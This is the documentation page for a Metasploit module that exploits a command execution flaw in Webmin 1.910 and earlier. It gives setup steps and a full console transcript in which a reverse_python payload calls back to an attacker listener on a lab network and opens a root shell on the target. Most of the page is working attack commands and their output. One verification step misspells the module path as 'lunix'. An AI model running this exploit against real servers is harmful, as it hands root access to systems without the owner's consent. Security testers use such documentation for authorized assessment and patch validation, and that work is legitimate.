Webmin Packageup Rce - Metasploit Framework

Description

This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.

Vulnerable Application

This module has been tested with Webmin 1.910

Verification Steps

use exploit/lunix/http/webmin_packageup_rce
set rhosts <rhost>
set username <username>
set password <password>
exploit

Scenarios

Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64

msf >
msf > use exploit/linux/http/webmin_packageup_rce
msf exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(linux/http/webmin_packageup_rce) > set USERNAME rce
USERNAME => rce
msf exploit(linux/http/webmin_packageup_rce) > set PASSWORD password
PASSWORD => password
msf exploit(linux/http/webmin_packageup_rce) > check

[*] NICE! rce has the right to >>Package Update<<
[+] 192.168.1.9:10000 - The target is vulnerable.
msf exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.12:4444 
[+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5
[*] Attempting to execute the payload...
[*] Command shell session 12 opened (192.168.1.12:4444 -> 192.168.1.9:47552) at 2019-06-16 18:21:46 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux AkkuS 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
pwd
/usr/share/webmin/package-updates/
exit